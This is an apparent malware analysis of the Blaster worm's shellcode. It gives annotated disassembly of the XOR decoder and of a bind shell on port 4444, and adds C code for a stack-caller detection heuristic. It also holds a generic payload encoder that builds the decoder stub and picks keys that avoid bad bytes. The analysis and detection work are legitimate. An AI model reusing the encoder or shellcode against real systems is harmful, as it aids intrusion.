Two years ago, when the "shock wave" (Blaster) virus broke out, I analysed its shellcode; here is the analysis I wrote at the time, so we can see what that generation of malware looked like.

In general, shellcode is written this way, so as long as a hooked API compares ESP with the caller's EIP (the return address the hook sees) and the difference is within 0x1000, meaning the code is running on the stack, you can be fairly sure the process is under a buffer-overflow attack and must exit immediately. Of course, some more capable shellcode calls native APIs directly, uses raw sockets and similar techniques, and then monitoring for buffer-overflow attacks by hooking APIs is no longer effective. There are other ways to approach it, but such shellcode is considerably larger and is hard to make generic across systems and vulnerabilities.
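The ESP/EIP distance check described above, as an added example that is not part of the original analysis: caller_on_stack is the bare heuristic, and hooked_api shows how a hook would apply it using the return address and frame address exposed by the GCC/Clang builtins (__builtin_frame_address yields the frame pointer rather than ESP itself, which for this check is within the same window). The 0x1000 threshold comes from the post; the 32-bit addresses used in main are constructed test values.

```c
#include <stdint.h>
#include <stdio.h>

/* Window from the post: a return address within 0x1000 bytes of the stack pointer means
   the caller itself lives on the stack, i.e. the API was reached from injected shellcode. */
#define STACK_WINDOW 0x1000u

/* Bare heuristic: 1 if |ret_addr - sp| < STACK_WINDOW, else 0. */
int caller_on_stack(uintptr_t ret_addr, uintptr_t sp) {
    uintptr_t diff = ret_addr > sp ? ret_addr - sp : sp - ret_addr;
    return diff < STACK_WINDOW;
}

/* Stand-in for the body of a hooked API. A real hook would run this before forwarding to the
   genuine function and would terminate the process instead of returning -1. */
__attribute__((noinline)) int hooked_api(void) {
    uintptr_t ret = (uintptr_t)__builtin_return_address(0); /* the caller's EIP */
    uintptr_t sp  = (uintptr_t)__builtin_frame_address(0);  /* frame pointer, a few bytes from ESP */
    if (caller_on_stack(ret, sp))
        return -1;   /* attack: TerminateProcess/exit would go here */
    return 0;        /* caller is in a code section: forward to the real API */
}

int main(void) {
    /* Called from main, which lives in the code section: the heuristic must not fire. */
    printf("hooked_api from main -> %d\n", hooked_api());
    /* Constructed 32-bit addresses: a return address 0x40 bytes above ESP (shellcode on the
       stack) versus a return address inside an image at 00401023. */
    printf("ret on stack -> %d\n", caller_on_stack(0x0012FF80u, 0x0012FF40u));
    printf("ret in image -> %d\n", caller_on_stack(0x00401023u, 0x0012FF40u));
    return 0;
}
```

As the post says, this only catches shellcode that calls the hooked API straight from the stack; a payload that copies itself elsewhere first, or that reaches the native API without going through the hooked export, is not seen by it.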
In the exploit, the bytes 00 and 5C (backslash) cannot appear, so be careful when writing the code, because many instructions contain 00. For example, mov ecx,8 encodes as B9 08 00 00 00, with three zero bytes, so it has to be rewritten as xor ecx,ecx / mov cl,8, or push 8 / pop ecx, or xor ecx,ecx / sub ecx,-8. The restriction applies to what is sent over the wire: the decoder stub below must be clean, while the body from 00401023 on is XOR-encoded in transit and may contain such bytes once decoded.
: 00401000 90             nop
: 00401001 90             nop
: 00401002 90             nop
: 00401003 EB19           jmp 0040101E
: 00401005 5E             pop esi                        ; esi = 00401023, the return address pushed by the call at 0040101E; the code from 00401023 on is what gets restored. On the stack the address esi receives is not fixed, which is why it is obtained with a call/pop rather than a constant
: 00401006 31C9           xor ecx, ecx
: 00401008 81E989FFFFFF   sub ecx, FFFFFF89h             ; FFFFFF89h = -77h, so ecx = 77h (119 dwords)
: 0040100E 813680BF3294   xor dword ptr [esi], 9432BF80h ; restore (decrypt) the encrypted code starting at 00401023, one dword at a time
: 00401014 81EEFCFFFFFF   sub esi, FFFFFFFCh             ; equivalent to add esi, 4
: 0040101A E2F2           loop 0040100E
: 0040101C EB05           jmp 00401023                   ; restore complete, jump to the restored code
: 0040101E E8E2FFFFFF     call 00401005                  ; equivalent to push 00401023 / jmp 00401005
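As an added example (not code from the original analysis), the following C program rebuilds the decoder stub above from a key and dword count, XOR-encodes a body exactly as the loop at 0040100E decodes it, and checks both the stub and the encoded body against the bad bytes from the previous paragraph; it also covers the mov ecx,8 encodings compared there. find_clean_key goes beyond the listing by choosing a key automatically rather than using 9432BF80h. The 12-byte sample body is constructed from bytes in the listing; the helper names and the 256-byte working buffer are assumptions of this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Bytes the exploit buffer cannot carry (from the post: 00 and 5C). */
static const uint8_t BAD_BYTES[] = { 0x00, 0x5C };

static int is_bad(uint8_t b) {
    for (size_t i = 0; i < sizeof BAD_BYTES; i++)
        if (b == BAD_BYTES[i]) return 1;
    return 0;
}

/* Index of the first bad byte in buf, or -1 if the buffer is clean. */
long first_bad_byte(const uint8_t *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (is_bad(buf[i])) return (long)i;
    return -1;
}

/* Little-endian dword access, so the program does not depend on host byte order. */
static uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* The encodings of "ecx = 8" compared in the post (32-bit x86). */
const uint8_t ENC_MOV_ECX_8[]  = { 0xB9, 0x08, 0x00, 0x00, 0x00 }; /* mov ecx,8 */
const uint8_t ENC_XOR_MOV_CL[] = { 0x31, 0xC9, 0xB1, 0x08 };       /* xor ecx,ecx / mov cl,8 */
const uint8_t ENC_PUSH_POP[]   = { 0x6A, 0x08, 0x59 };             /* push 8 / pop ecx */
const uint8_t ENC_XOR_SUB[]    = { 0x31, 0xC9, 0x83, 0xE9, 0xF8 }; /* xor ecx,ecx / sub ecx,-8 */

#define STUB_LEN 32

/* Rebuild the 32-byte decoder stub (00401003..00401022) for a given key and dword count:
   jmp +19h / pop esi / xor ecx,ecx / sub ecx,-n / L: xor [esi],key / sub esi,-4 / loop L / jmp +5 / call pop_esi */
void build_decoder_stub(uint8_t out[STUB_LEN], uint32_t key, uint32_t ndwords) {
    static const uint8_t head[] = { 0xEB, 0x19, 0x5E, 0x31, 0xC9, 0x81, 0xE9 };
    static const uint8_t mid[]  = { 0x81, 0x36 };
    static const uint8_t tail[] = { 0x81, 0xEE, 0xFC, 0xFF, 0xFF, 0xFF, 0xE2, 0xF2,
                                    0xEB, 0x05, 0xE8, 0xE2, 0xFF, 0xFF, 0xFF };
    size_t p = 0;
    memcpy(out + p, head, sizeof head); p += sizeof head;
    put_le32(out + p, 0u - ndwords);    p += 4;   /* sub ecx, -n  ->  ecx = n */
    memcpy(out + p, mid, sizeof mid);   p += sizeof mid;
    put_le32(out + p, key);             p += 4;   /* xor dword ptr [esi], key */
    memcpy(out + p, tail, sizeof tail);
}

/* XOR every dword with key, as the loop at 0040100E does. len must be a multiple of 4.
   The same call encodes a body before sending and decodes it on the stack. Returns the dword count. */
uint32_t xor_dwords(uint8_t *buf, size_t len, uint32_t key) {
    for (size_t i = 0; i + 4 <= len; i += 4)
        put_le32(buf + i, get_le32(buf + i) ^ key);
    return (uint32_t)(len / 4);
}

/* Choose a key such that neither the key bytes (they sit in the stub) nor any encoded body byte is bad.
   Key byte j only touches body bytes at positions j, j+4, ..., so the four bytes are chosen independently. */
int find_clean_key(const uint8_t *body, size_t len, uint32_t *key_out) {
    uint8_t kb[4];
    for (size_t j = 0; j < 4; j++) {
        int ok = 0;
        for (int cand = 0; cand < 256 && !ok; cand++) {
            if (is_bad((uint8_t)cand)) continue;
            ok = 1;
            for (size_t i = j; i < len; i += 4)
                if (is_bad(body[i] ^ (uint8_t)cand)) { ok = 0; break; }
            if (ok) kb[j] = (uint8_t)cand;
        }
        if (!ok) return 0;
    }
    *key_out = get_le32(kb);
    return 1;
}

/* Encode a body, check that stub and encoded body are free of bad bytes, then decode and compare.
   Returns 1 when the whole payload would survive the bad-byte filter and decode correctly. */
int roundtrip_clean(const uint8_t *plain, size_t len, uint32_t key) {
    uint8_t stub[STUB_LEN], work[256];   /* 256 bytes is an arbitrary limit for this example */
    if (len > sizeof work || len % 4 != 0) return 0;
    memcpy(work, plain, len);
    uint32_t n = xor_dwords(work, len, key);      /* what is sent over the wire */
    build_decoder_stub(stub, key, n);
    if (first_bad_byte(stub, STUB_LEN) != -1) return 0;
    if (first_bad_byte(work, len) != -1) return 0;
    xor_dwords(work, len, key);                   /* what the stub does on the stack */
    return memcmp(work, plain, len) == 0;
}

/* Constructed sample body from bytes in the listing: sub esp,34h / mov esi,esp / push 5C110002h,
   padded with two NOPs to a dword multiple. Unencoded it contains both a 00 and a 5C. */
const uint8_t SAMPLE_BODY[12] = { 0x83, 0xEC, 0x34, 0x8B, 0xF4, 0x68, 0x02, 0x00, 0x11, 0x5C, 0x90, 0x90 };
```

Note that the dword count is embedded as a negated immediate, so a body of exactly 0x100 dwords (1024 bytes) would put a 00 into the stub's sub ecx operand; roundtrip_clean catches that by checking the stub as well as the body.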
The code from here on has been restored (decrypted):
: 00401023 83EC34         sub esp, 34h
: 00401026 8BF4           mov esi, esp                   ; esi -> variable table (the resolved API addresses are called through it below)

: 004010FF 57             push edi                       ; edi = 0
: 00401100 57             push edi                       ; edi = 0
: 00401101 680200115C     push 5C110002h                 ; sin_family = 2 (AF_INET), sin_port = 115Ch = 4444 in network byte order; the sockaddr_in structure is incomplete, 4 bytes short
: 00401106 8BCC           mov ecx, esp                   ; ecx -> 02 00 11 5C 00 00 00 00 00 00 00 00
: 00401108 6A16           push 16h                       ; namelen; this parameter should be 10h
: 0040110A 51             push ecx                       ; ecx -> the sockaddr_in above
: 0040110B 53             push ebx                       ; hsocket
: 0040110C FF5620         call dword ptr [esi+20h]       ; bind: bind port 4444
: 0040110F 57             push edi                       ; 0
: 00401110 53             push ebx                       ; hsocket
: 00401111 FF5624         call dword ptr [esi+24h]       ; listen: port 4444 enters the listening state
: 00401114 57             push edi                       ; 0
: 00401115 51             push ecx                       ; ecx = 0A2340h here (it was clobbered by the bind call); this argument seems wrong, it could be 0
: 00401116 53             push ebx                       ; hsocket
: 00401117 FF5628         call dword ptr [esi+28h]       ; accept: accept the connection from the attacking host and begin receiving the DOS commands it sends
: 0040111A 8BD0           mov edx, eax                   ; eax = 324h, the handle of the accepted socket, saved in edx
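The sockaddr_in that the three pushes at 004010FF..00401101 build, decoded the way bind reads it, as an added example that is not part of the original analysis. stack_layout reproduces the memory image the pushes leave (last push at the lowest address, which is what ecx points to), and decode_sockaddr_block overlays it as a struct sockaddr_in to confirm the family, the port and the 4-byte shortfall noted above. It assumes a little-endian host and the POSIX struct sockaddr_in, which has the same 16-byte layout as the Winsock one; the helper names and the NAMELEN_PASSED macro are assumptions of this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <netinet/in.h>   /* struct sockaddr_in, AF_INET, INADDR_ANY */
#include <arpa/inet.h>    /* ntohs, ntohl */

/* Lay out a sequence of 32-bit pushes as they sit in memory afterwards: the last push lands at the
   lowest address (what ESP, and hence ecx, points to), each dword little-endian. Returns bytes written. */
size_t stack_layout(const uint32_t *pushes, size_t n, uint8_t *out, size_t cap) {
    if (n * 4 > cap) return 0;
    for (size_t i = 0; i < n; i++) {
        uint32_t v = pushes[n - 1 - i];
        out[4 * i]     = (uint8_t)v;          out[4 * i + 1] = (uint8_t)(v >> 8);
        out[4 * i + 2] = (uint8_t)(v >> 16);  out[4 * i + 3] = (uint8_t)(v >> 24);
    }
    return n * 4;
}

struct decoded_addr {
    int family;             /* sin_family */
    uint16_t port;          /* sin_port converted to host order */
    uint32_t addr;          /* sin_addr in host order (0 = INADDR_ANY) */
    size_t bytes_on_stack;  /* how much of the structure the pushes actually provided */
    size_t bytes_needed;    /* sizeof(struct sockaddr_in) */
};

/* Overlay a stack block as bind() reads it. Bytes beyond the block are zero here; on the real stack
   they are whatever lay above the pushes, which only lands in sin_zero. */
struct decoded_addr decode_sockaddr_block(const uint8_t *blk, size_t len) {
    struct sockaddr_in sa;
    struct decoded_addr d;
    memset(&sa, 0, sizeof sa);
    memcpy(&sa, blk, len < sizeof sa ? len : sizeof sa);
    d.family = sa.sin_family;
    d.port = ntohs(sa.sin_port);
    d.addr = ntohl(sa.sin_addr.s_addr);
    d.bytes_on_stack = len;
    d.bytes_needed = sizeof sa;
    return d;
}

/* The three pushes at 004010FF..00401101 in execution order (edi = 0, edi = 0, 5C110002h). */
const uint32_t LISTING_PUSHES[3] = { 0x00000000u, 0x00000000u, 0x5C110002u };

/* namelen the stub passes to bind (push 16h); the post says it should be 10h = sizeof(struct sockaddr_in). */
#define NAMELEN_PASSED 0x16

/* Decode the listing's own sockaddr block. */
struct decoded_addr decode_listing_sockaddr(void) {
    uint8_t blk[64];
    size_t len = stack_layout(LISTING_PUSHES, 3, blk, sizeof blk);
    return decode_sockaddr_block(blk, len);
}
```

The decoded block gives AF_INET, port 4444 on INADDR_ANY and 12 bytes where the structure is 16, which is the "4 bytes short" remark in the listing; since the missing bytes are only the tail of sin_zero, bind still accepts it.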